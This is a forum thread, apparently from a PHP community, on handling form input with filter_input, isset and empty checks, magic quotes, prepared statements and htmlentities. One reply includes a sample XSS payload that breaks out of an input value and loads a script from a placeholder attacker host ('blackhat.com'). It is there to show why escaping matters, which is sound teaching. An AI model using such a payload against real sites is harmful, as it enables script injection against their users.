$_POST or filtered $_POST?

Hello all,

I’ve been told that:

$_GET, $_POST, $_COOKIE and $_REQUEST are filtered with default filter. filter_input(INPUT_POST, ‘pwd’) without additional parameters also uses the default filter.
So there is no difference at all between using $_POST alone and $_POST with filter.

Is this precise? So how do we normally should protect those $_POST or $_GET when coming from client script ?

htmlentities?

What do you use? And Why?

Thanks in advance,
Márcio

That’s right, which is why it’s typically a good policy to escape the values only at the very last moment, so that you can escape them as is appropriate for the situation.

If you choose not to encode the submitted content, you may end up with this:


<input type="text" name="email" value="this is "a test"">

It may also be possible to submit bad content, such as:

[indent]">
<script src=“http://blackhat.com/exploit.js”></script>
<p id="Pwned![/indent]

which would result in an empty value, and bad stuff happening:


<input type="text" name="email" value="">
<script src="http://blackhat.com/exploit.js"></script>
<p id="Pwned!">

So yes, you should always escape form values. Any and all data from the user must be considered suspect.

Hm… so, it seems that we have at least two or three ways for escaping:

a) adding explicitly addslashes on a $_POST or $_GET… and so on;

b) Use prepare statements that do the job.

c) Use a value object setter that will have our superglobals as arguments, and will escape them and do all the job that needs to be done before we get them.

Sanitize and Validation are two different things and PHP seems to separate them, and it seems that we can borrow that separation logic for our applications? Or, should we sanitize and validate all on one layer?

Still, at least on a conceptual point, and despite the 3 distinctions layers that Oddz talked, it seems to me that we need a way to transverse all those layers, somehow, in order to unify the error messages display to the user, so that we can have one place to edit those messages and manage centrally, all user input security policies. No?

To clarify if you take input from a form to enter into something like a database you dont do anything to the data except escape it for security reasons correct? From my experience that should be the process as you preserve the original data, then when you display it is when you actually use something like htmlentities.

But if you have a form and the user submits it and there is an error because a field has an incorrect value dont you need to do something like htmlentities to the value so you wont have issues with the form? Meaning if I type in a form field, this is “a test” and submit, if I just echo the value back into the field I get this is \, or just this is

So dont I have to instead html encode it so it shows properly in the form field?

Only when you’re expecting a falsey value that’s not null. The type comparison tables can help to understand the differences, as well as to educate about the problems with loose type checking.

When dealing with strings, about the only time is when “0” would be considered to be a valid value, because strangely enough, empty(“0”) is true. Checking that the value is greater than an empty string can be a useful and meaningful comparison though.


if ($email > '') {
    // do email stuff
}

Guilty. :x

It’s also often common to see both !empty and isset altogether on the same conditional statement.

According to others however, !empty seems to work fine all by itself.

By using filter_input, isset isn’t an option and === NULL should be used instead?

On what circumstances would we prefer to verify if a given $_POST or $_GET value isn’t NULL and not just !empty ?

Sorry, I’m reaching my own limits and I realise that. If you could understand my difficulties from the evident struggle for formulating those questions, then I would see some light over all those subjects.
If not, then, worry not, I will give myself some time.

Thanks a lot,
Márcio

Yes… I realise my question was somehow unrelated with the initial question, and much more a “how to design question” I will ask there then. :wink:

Márcio

filter_input is a function that can be used to get user input and optionally [URL=“http://www.php.net/manual/en/filter.filters.php”]filter it.

What do you use? And Why?

It depends on what you are doing, but in general, prepared statements to input to the db (coupled with any filters or validation checks you need), and at least htmlspecialchars on the output.

A good question. Neither of them throw warnings or errors.

Bad solutions

What does throw warnings or errors is the following:


$email = $_POST['email'];

Some people check to see if it exists, and assign the value only then.


if (isset($_POST['email'])) {
    $email = $_POST['email'];
}

But if the email item doesn’t exist, you then fall out of the if statement without having $email assigned at all.

Solutions when filter_input cannot be used

One solution is to assign the value and then check if it contains a bad value:


if (isset($_POST['email'])) {
    $email = $_POST['email'];
}
if (empty($email)) {
    $email = '';
}

Another solutions involve using if/else statements


if (isset($_POST['email'])) {
    $email = $_POST['email'];
} else {
    $email = '';
}

But the preferred solution, by me at least anyway when not using filter_input, is to set up an initial default value, and then to reassign it if the item exists.


$email = '';
if (isset($_POST['email'])) {
    $email = $_POST['email'];
}

Those last three pieces of code ensure that you get an $email value with either the submitted value, or to default to at least an empty string.

The filter_input solution

The filter_input function simplifies the whole process, and provides better protection. Here’s what you get instead:

Value of the requested variable on success, FALSE if the filter fails, or NULL if the variable_name variable is not set.

Protection later in your code

Later on in your code, it can be common to check if the variable is empty before using it, which will work regardless of whichever technique is used beforehand.


if (!empty($email)) {
    // do stuff with $email value here
}

There are really three things to concern yourself with when saving user input:

1.) Format
2.) Table compatibility
3.) Dangerous

Now, depending on the system or field the formatting check may take care of all the above. For example, a validation that makes certain input follows a phone number format will indirectly cover 2 and 3.

When necessary the table compatibility layer will make sure the data can actually be placed into the table without error. This is a lower level check that concerns data integrity, data types and uniqueness. For example, user names would be checked to see if they are unregistered at this layer and provide the proper feedback to the user when the chosen one is taken. You could also check here that the value selected in a drop down does in fact reference a field in another table. Now, depending on how well your database set-up is you may not need to worry about some of these items but it is always good to provide feedback to users on errors. The only way to properly do that is to anticipate and check each circumstance ahead time.

The lowest level applies to all user input and regards making sure input isn’t dangerous. This is were you would escape data to make it isn’t going destructive. You could of course do other security checks as well but the for the most part escaping is the vital one.

With all 3 of these levels the higher one may take of concerns with a lower one. For example, validating a phone number format negates a escape issue when done properly.

However, in many systems the layer used to manipulate the database is separate from layer used for processing logic. Therefore, it is more concrete and less prone to failure to place security precaution responsibilities with the layer directly communicating with the storage facility than it is to rely on all outside communication to handle security concerns.

With that said, I’ve never been one to filter the entire post array. I always leave it up to the data layer to handle security issues.

Right, so you should escape form values when displaying them back into a form, but dont you need to revert them back to the original state when entering into the database? For example if I have this as a value in a form after I filtered it:


<input type="text" name="title" value="My &quot;title&quot;">

You don’t want to enter the data into the database with the html symbols you want it to enter with the original data which was My “title”. You want to preserve the original content. Correct? Because what if I have a search function that searches the title field? Wouldn’t the html symbols skew the results?

Just the one layer may not do the job. For any subsection it is useful to validate what comes in, and to sanitize what goes out.

I suspect that the people in the PHP Application Design forum will have plenty more to add to this topic.

We sure found a lot of information about those subjects. I do believe, however, that only some seem to have the discernibility to properly divide them, on subject and temporal contexts and to organize this excess of misinformation now conducing our dear world wide web. Or, in less words: Thanks a lot .


About 1)

You are telling that

You can use one of the two following sets

Does this means that, if, for retrieving the records, we do:

$email = filter_input(INPUT_GET, 'email');

we don’t need to use

$_GET['email']

?

For the first set you have commented
// retrieve a value without warnings or errors

Does this means that, the second set, despite the nice filter usage, has the drawback of throwing some warnings?

Thanks again,
Márcio

It’s also often common to see both !empty and isset altogether on the same conditional statement.

According to others however, !empty seems to work fine all by itself.

empty takes care of isset, you only need empty. Just watch for what Paul mentioned: the string (all post/get comes through as strings) “0” is empty.

I lost the first version to a web search (new tab, dammit!) so here’s take two.

1. Getting the values

You can use one of the two following sets of code to retrieve a value:


// safely retrieve a value without filter_input
$email = '';
if (isset($_GET['email'])) {
    $email = $_GET['email'];
}


// filter_input can be used from PHP 5.2 onwards
$email = filter_input(INPUT_GET, 'email');

The benefit of using filter_input is that you can also apply filters to the values. For example, with an email address there is the FILTER_SANITIZE_EMAIL filter.


$email = filter_input(INPUT_GET, 'email', FILTER_SANITIZE_EMAIL);

2. Magic quotes

None of the above yet protects your code from potentially malicious input. Up to PHP 5.3 it’s magic quotes that attempted to provide the protection. That was found to be less than adequate, with mysql_real_escape_string or prepared statements providing better protection, so as of PHP 5.3 the magic quotes are officially deprecated. In PHP 6.0 they won’t exist at all. This means changing your mindset so that the code you write now, will have a better chance to be issue-free later on.

You need to approach things with the assumption that magic quotes are no longer there. If they just-so-happen to be enabled, you need to remove the added slashes from the values, so that you don’t run the risk of double-escaping the values.


if (get_magic_quotes_gpc()) {
    $email = stripslashes($email);
}

There are also many other ways to disable magic quotes, my favourite being to disable them completely at the server, but if your code is going to be run in an unknown environment, you can apply added protection so that it still works as-per-normal, or even dies with an appropriate error message.

3. Handling values

The values that you now have must still be considered to be untrusted, and potentially dangerous. When passed to the database they may contain attempted SQL Injection code, and when passed to the web page they may contain XSS code. Your code needs to now treat them as untrusted values, as they came from an untrusted source, the user. This is not to say that they will contain bad values. It’s only to say that the potential for bad values still exists.

There are some ways to protect against bad values when getting values in, but the only way to provide proper protection is to make sure that the values are safe when they are going out, whether that be to the database, the web page, or other places like email, XML, files, url, etc.

4. Output to database

Sending values to the database is fraught with issues, but if you ensure that your database values are escaped only once, you should be safe. The appropriate ways to do that are to use mysql_real_escape_string at the database query itself, as in the example on the mysql_real_escape_string documentation page, or by using prepared statements with for example, [url=“http://www.php.net/manual/en/mysqli.prepare.php”]mysqli_prepare.

5. Output to the page

As you were saying before, htmlentities is useful for outputting values to the page.


echo 'An email has been sent to you at ' .
   '<strong>' . htmlentities($email) . '</strong>';

There is a lot more to be said about thess topics, but it’s kinda late for me now (1am), and the topic has been well covered here before, such as:

[list][]magic_quotes_gpc - how to handle in PHP 5.3 and 6.0
[
]How do I eliminate the \ from MySQL returned data
[*]html entities?[/list]

We might even be encouraged some day to put together a proper reference about all of this.

From my part. Thanks a lot for the detail explanations.
I rest my case. :slight_smile:

Regards,
Márcio

I have not properly understand what checking if a string is greater then empty string means… because we are on a string context when we use > are we? but that I must leave for later. Those are heavy subjects, believe it or not. :slight_smile: